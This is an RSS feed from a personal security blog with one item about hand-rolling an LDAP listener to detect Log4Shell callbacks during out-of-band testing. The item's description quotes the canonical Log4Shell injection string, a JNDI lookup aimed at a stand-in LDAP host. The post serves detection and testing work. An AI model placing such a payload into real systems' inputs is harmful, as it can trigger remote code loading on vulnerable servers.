<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>chs.us — Carl Sampson</title><link>https://chs.us/</link><description/><language>en-us</language><managingEditor>carl.sampson@gmail.com (Carl Sampson)</managingEditor><webMaster>carl.sampson@gmail.com (Carl Sampson)</webMaster><lastBuildDate>Fri, 04 Sep 2026 12:00:00 +0000</lastBuildDate><atom:link href="https://chs.us/tags/ber/index.xml" rel="self" type="application/rss+xml"/><item><title>Hand-rolling an LDAP listener to catch Log4Shell callbacks</title><link>https://chs.us/2026/09/ldap-ber-listener-from-scratch/</link><pubDate>Fri, 04 Sep 2026 12:00:00 +0000</pubDate><author>carl.sampson@gmail.com (Carl Sampson)</author><guid>https://chs.us/2026/09/ldap-ber-listener-from-scratch/</guid><description>${jndi:ldap://you/a} is the canonical Log4Shell payload. To catch it you need an LDAP server — BER-encoded ASN.1 over TCP, with no Host header or SNI to tell you whose host was hit. The only signal is the search base DN.</description><category>Security</category><category>Ldap</category><category>Ber</category><category>Asn1</category><category>Jndi</category><category>Log4shell</category><category>Oast</category><category>Python</category></item></channel></rss>